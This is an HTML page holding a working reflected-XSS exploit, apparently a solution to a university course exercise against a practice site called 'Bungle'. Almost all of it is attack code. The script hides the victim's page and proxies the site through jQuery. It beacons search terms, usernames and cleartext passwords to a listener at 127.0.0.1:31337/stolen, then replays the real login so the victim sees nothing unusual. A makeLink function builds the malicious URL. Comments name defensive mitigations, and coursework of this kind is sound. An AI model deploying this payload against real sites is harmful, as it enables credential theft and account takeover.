  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  // Reflected-XSS payload for the "Bungle" course exercise (see makeLink below).  It is injected
  // through the search parameter, replaces the visible document with a jQuery-driven copy of the
  // real site, and beacons navigation events, entered credentials and logouts to the
  // attacker-controlled URL as plain GET requests.
  // Defender's view: the injection point is an HTML-unencoded reflected parameter; standard
  // mitigations are contextual output encoding, a Content-Security-Policy that disallows inline
  // script, and HttpOnly/SameSite session cookies.  On the wire the beacons are recognisable as
  // outbound GETs whose query string carries "event=login&user=...&pass=...".
  // @param {string} attacker - base URL of the collection endpoint the beacons are sent to
  4. function payload(attacker) {
  // Fire-and-forget beacon: the response is never read, and timeout: 1 presumably makes jQuery
  // abort the request almost immediately after it has been issued.
  5. function spyGet(spy_url){
  6. $.ajax({
  7. url: spy_url,
  8. type: "GET",
  9. timeout: 1
  10. });
  11. }
  // Reads the displayed user name from #logged-in-user, or null when that element is absent.
  12. function getUser(){
  13. var username;
  14. if($("#logged-in-user").length != 0){
  15. username = $("#logged-in-user").innerText;
  16. }
  17. else{
  18. username = null;
  19. }
  20. return username;
  21. }
  // Reports a search as a "nav" event.  data is the relative path (e.g. "./search?q=..."); substr(2)
  // strips the leading "./" before it is appended to the reported URL.  Neither the user name nor
  // the search text is URL-encoded before concatenation.
  22. function logSearch(data) {
  23. var username = getUser();
  24. var get_url = attacker + "?event=nav";
  25. if(username != null){
  26. get_url = get_url + "&user=" + username;
  27. }
  28. get_url = get_url + "&url=http://trurl.cs.illinois.edu/" + data.substr(2);
  29. spyGet(get_url);
  30. }
  // Reports a logout followed by a "nav" event for the front page; the data argument is unused.
  31. function logLogout(data){
  32. var logout_url = attacker + "?event=logout&user=" + getUser();
  33. var get_url = attacker + "?event=nav&url=http://trurl.cs.illinois.edu/";
  34. spyGet(logout_url);
  35. spyGet(get_url);
  36. }
  // Sends the credentials typed into the proxied login form, in clear text, as query parameters
  // of a "login" event, then a "nav" event for the front page.
  37. function logLogin(username, password){
  38. var login_url = attacker + "?event=login&user=" + username + "&pass=" + password;
  39. var get_url = attacker + "?event=nav&user=" + username + "&url=http://trurl.cs.illinois.edu/";
  40. spyGet(login_url);
  41. spyGet(get_url);
  42. }
  // Identical to logLogin (account creation is reported with the same "login" event name).
  43. function logCreateAccount(username, password){
  44. var login_url = attacker + "?event=login&user=" + username + "&pass=" + password;
  45. var get_url = attacker + "?event=nav&user=" + username + "&url=http://trurl.cs.illinois.edu/";
  46. spyGet(login_url);
  47. spyGet(get_url);
  48. }
  // Reports a visit to the front page as a "nav" event; the data argument is unused.
  49. function logHome(data){
  50. var username = getUser();
  51. var get_url = attacker + "?event=nav";
  52. if(username != null){
  53. get_url = get_url + "&user=" + username;
  54. }
  55. get_url = get_url + "&url=http://trurl.cs.illinois.edu/";
  56. spyGet(get_url);
  57. }
  // Reports a click on a history entry as a "nav" event; same shape as logSearch.
  58. function logHistory(data){
  59. var username = getUser();
  60. var get_url = attacker + "?event=nav";
  61. if(username != null){
  62. get_url = get_url + "&user=" + username;
  63. }
  64. get_url = get_url + "&url=http://trurl.cs.illinois.edu/" + data.substr(2);
  65. spyGet(get_url);
  66. }
  // Loads the real page at href into <html> with $.load and re-binds the site's controls so that
  // every user action first passes through one of the log* hooks above and is then replayed
  // against the real endpoints, keeping the injected script alive across "navigation".
  // @param {string} href - relative path of the page to fetch and display
  67. function proxy(href) {
  68. $("html").load(href, function(){
  69. $("html").show();
  70. $("#query").val("pwned!");
  71. $("#bungle-lnk, #search-again-btn").click(function(e) {
  72. e.preventDefault();
  73. logHome("./");
  74. proxy("./");
  75. });
  76. $("#search-btn").click(function(e) {
  77. e.preventDefault();
  78. var search = $("#query").val();
  79. logSearch("./search?q=" + search);
  80. proxy("./search?q=" + search);
  81. });
  82. $(".history-item").click(function(e) {
  83. var url = $(this).attr("href");
  84. e.preventDefault();
  85. logHistory(url);
  86. proxy(url);
  87. });
  // Login: credentials are beaconed before the real POST /login is replayed, so the
  // victim still ends up logged in and sees nothing unusual.
  88. $("#log-in-btn").click(function(e) {
  89. e.preventDefault();
  90. var username = $("#username").val();
  91. var userpass = $("#userpass").val();
  92. logLogin(username, userpass);
  93. $.ajax({
  94. type: "POST",
  95. url: "http://trurl.cs.illinois.edu/login",
  96. dataType: "text",
  97. data: {
  98. username: username,
  99. password: userpass
  100. },
  101. success: function(){
  102. proxy("./");
  103. }
  104. });
  105. });
  106. 
  // Account creation: POST /create, then POST /login with the same credentials, then reload.
  107. $("#new-account-btn").click(function(e) {
  108. e.preventDefault();
  109. var username = $("#username").val();
  110. var userpass = $("#userpass").val();
  111. logCreateAccount(username, userpass);
  112. $.ajax({
  113. type: "POST",
  114. url: "http://trurl.cs.illinois.edu/create",
  115. dataType: "text",
  116. data: {
  117. username: username,
  118. password: userpass
  119. },
  120. success: function(){
  121. $.ajax({
  122. type: "POST",
  123. url: "http://trurl.cs.illinois.edu/login",
  124. dataType: "text",
  125. data: {
  126. username: username,
  127. password: userpass
  128. },
  129. success: function(){
  130. proxy("./");
  131. }
  132. });
  133. }
  134. });
  135. });
  136. 
  137. $("#log-out-btn").click(function(e) {
  138. e.preventDefault();
  139. logLogout("./");
  140. $.ajax({
  141. type: "POST",
  142. url: "http://trurl.cs.illinois.edu/logout",
  143. success: function(){
  144. proxy("./");
  145. }
  146. });
  147. });
  148. });
  149. }
  // Entry: hide the (reflected) page until the proxied front page has loaded.
  150. $("html").hide();
  151. proxy("./");
  152. }
  153.  
  // Builds the link that delivers the payload: the source of payload() is serialised with
  // Function.prototype.toString, wrapped in a script element (the tag is split into pieces,
  // presumably so the literal does not close the enclosing <script> early) and placed in the
  // q parameter.  Only the xssdefense == 0 level (no defense) is handled; any other level
  // falls through and returns undefined.
  // @param {number} xssdefense - defense level of the target page
  // @param {string} target - base URL of the vulnerable site
  // @param {string} attacker - collection endpoint passed through to payload()
  // @returns {string|undefined} the crafted URL, or undefined for unsupported levels
  154. function makeLink(xssdefense, target, attacker) {
  155. if (xssdefense == 0) {
  156. return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/script>");
  157. }
  158. }
  159.  
  // Exercise configuration: the defense level, the target site and the loopback listener that
  // receives the beacons.
  160. var xssdefense = 0;
  161. var target = "http://trurl.cs.illinois.edu/";
  162. var attacker = "http://127.0.0.1:31337/stolen";
  163. 
  // On DOM ready, write the crafted link into the <h3> below; the url is inserted into the
  // anchor's href without HTML attribute encoding.
  164. $(function() {
  165. var url = makeLink(xssdefense, target, attacker);
  166. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
  167. });
  168. </script>
  169.  
  170. <h3></h3>